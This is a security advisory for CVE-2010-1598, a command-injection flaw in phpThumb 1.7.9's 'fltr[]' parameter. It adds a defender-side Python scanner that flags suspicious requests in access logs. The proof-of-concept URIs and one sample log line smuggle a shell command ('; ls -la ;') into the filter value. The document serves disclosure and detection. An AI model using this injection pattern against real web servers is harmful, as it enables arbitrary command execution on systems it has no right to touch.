phpThumb() 'fltr[]' Parameter Command Injection Vulnerability
BID:39605
Info
| Bugtraq ID: | 39605 |
| Class: | Input Validation Error |
| CVE: | CVE-2010-1598 |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 21 2010 12:00AM |
| Updated: | Feb 27 2014 04:52PM |
| Credit: | M4g |
| Vulnerable: | phpThumb phpThumb() 1.7.9; Johannes Jarolim Yet Another Photoblog (YAPB) 1.9.26; FLEXIcontent FLEXIcontent 1.5.3c; FLEXIcontent FLEXIcontent 1.5.3B |
| Not Vulnerable: | Johannes Jarolim Yet Another Photoblog (YAPB) 1.10.3; FLEXIcontent FLEXIcontent 1.5.4 |
Discussion
phpThumb() is prone to a command-injection vulnerability because input passed through the 'fltr[]' parameter is not properly sanitized before it reaches a shell command.
Attackers can exploit this issue to execute arbitrary commands in the context of the web server.
Note that successful exploitation requires 'ImageMagick' to be installed.
phpThumb() 1.7.9 is affected; other versions may also be vulnerable.
Exploit / POC
Attackers can exploit this issue via a browser. Reports indicate that this issue is being exploited in the wild.
The following example URIs are available:
http://www.example.com/phpThumb_1.7.9/phpThumb.php?src=Z:/home/example.com/www/kartinka.jpg&fltr[]=blur|5 -quality 75 -interlace line "Z:/home/example.com/www/kartinka.jpg" jpeg:"Z:/home/example.com
http://www.example.com/phpThumb_1.7.9/phpThumb.php?src=/home/example.com/public_html/kartinka.jpg&fltr[]=blur|5 -quality 75 -interlace line "/home/example.com/public_html/kartinka.jpg" jpeg:"/home/example.com/public_html/kartinka.jpg" ; ls -la ;&phpThumbDebug=9
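As an added defender-side example (not part of the advisory and not phpThumb's own code), the following Python scans web-server access log lines for phpThumb.php requests whose 'fltr[]' value carries shell metacharacters, or which request phpThumbDebug=9 as the PoC URIs above do. The sample log lines are constructed; the third one carries the advisory's second example URI percent-encoded as a browser would send it.

```python
import re
from urllib.parse import unquote_plus

# Shell metacharacters that never belong in a phpThumb filter spec such as "blur|5".
# "|" is phpThumb's own filter-argument separator, so it is deliberately not listed.
SHELL_META = re.compile(r'[;&`"\'<>\r\n]|\$\(')
# Request target inside a combined-format access log line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (not from the advisory): two benign phpThumb requests,
# then the advisory's second PoC URI percent-encoded as a browser would send it.
SAMPLE_LOG = [
    '10.0.0.5 - - [21/Apr/2010:10:00:01 +0000] "GET /phpThumb_1.7.9/phpThumb.php?src=images/a.jpg&w=200&fltr%5B%5D=blur%7C5 HTTP/1.1" 200 4120',
    '10.0.0.5 - - [21/Apr/2010:10:00:02 +0000] "GET /phpThumb_1.7.9/phpThumb.php?src=images/a.jpg&fltr%5B%5D=wmt%7CHello%20World%7C10 HTTP/1.1" 200 4388',
    '10.0.0.9 - - [21/Apr/2010:10:00:03 +0000] "GET /phpThumb_1.7.9/phpThumb.php?src=/home/example.com/public_html/kartinka.jpg&fltr%5B%5D=blur%7C5%20-quality%2075%20-interlace%20line%20%22/home/example.com/public_html/kartinka.jpg%22%20jpeg:%22/home/example.com/public_html/kartinka.jpg%22%20%3B%20ls%20-la%20%3B&phpThumbDebug=9 HTTP/1.1" 200 9731',
]

def parse_query(target):
    """Decode 'path?query' into (key, value) pairs, splitting on '&' only so an
    encoded ';' inside a value is never mistaken for a pair separator."""
    pairs = []
    for part in target.partition("?")[2].split("&"):
        if part:
            key, _, value = part.partition("=")
            pairs.append((unquote_plus(key), unquote_plus(value)))
    return pairs

def inspect_request(target):
    """Return indicator strings for one phpThumb request target (empty if clean)."""
    findings = []
    for key, value in parse_query(target):
        if key in ("fltr[]", "fltr") and SHELL_META.search(value):
            findings.append("fltr[] contains shell metacharacters: %r" % value[:40])
        if key == "phpThumbDebug" and value == "9":
            findings.append("phpThumbDebug=9 requested, as in the advisory's PoC URIs")
    return findings

def scan_access_log(lines):
    """Return (line_number, findings) for phpThumb.php requests matching CVE-2010-1598 indicators."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match and "phpthumb.php" in match.group(1).lower():
            findings = inspect_request(match.group(1))
            if findings:
                hits.append((lineno, findings))
    return hits
```

Only the third constructed line is reported; the watermark-text filter on line 2 contains a space but no shell metacharacters, so it is left alone.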
Solution / Fix
Solution:
Updates are available. Please see the references for details.
References
References:
- FLEXIcontent 1.5.4 is finally out! (FLEXIcontent)
- phpThumb <= 1.7.9 Arbitrary Command Execution Exploit (M4g)
- phpThumb Homepage (phpThumb)
- Yet Another Photoblog Plugin Homepage (jaroat)